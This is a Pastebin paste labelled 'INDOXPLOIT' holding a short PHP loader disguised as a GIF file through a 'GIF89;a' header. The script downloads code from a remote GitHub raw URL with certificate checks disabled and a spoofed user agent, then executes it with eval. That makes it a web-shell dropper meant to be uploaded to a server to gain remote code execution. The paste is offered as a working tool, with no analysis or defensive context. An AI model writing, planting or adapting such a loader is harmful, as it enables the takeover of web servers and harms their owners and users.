Advertisement
INDOXPLOIT

zz

Aug 24th, 2019
306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. GIF89;a
  2.  
  3. <?php
  4. function get_contents($url){
  5. $ch = curl_init("$url");
  6. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  7. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  8. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  9. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  10. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  11. curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  12. curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  13. $result = curl_exec($ch);
  14. return $result;
  15. }
  16.  
  17. $a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
  18. eval('?>'.$a);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement